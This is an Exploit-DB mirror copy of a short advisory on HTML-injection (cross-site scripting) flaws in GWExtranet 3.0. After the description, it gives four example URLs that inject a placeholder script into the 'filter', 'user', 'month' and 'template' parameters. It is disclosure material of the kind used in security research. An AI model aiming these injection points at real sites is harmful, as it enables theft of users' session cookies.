exploit-db-mirror/exploits/cgi/webapps/30808.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
876 B
Text

source: https://www.securityfocus.com/bid/26582/info
GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content.
Attacker-supplied HTML and script code could execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
GWExtranet 3.0 is affected by these issues; other versions may also be vulnerable.
http://www.example.com/GWExtranet/scp.dll/frmonth?filter=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?user=<EvilScript>
http://www.example.com/GWExtranet/scp.dll/frmonth?month=<EvilScript>
http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript>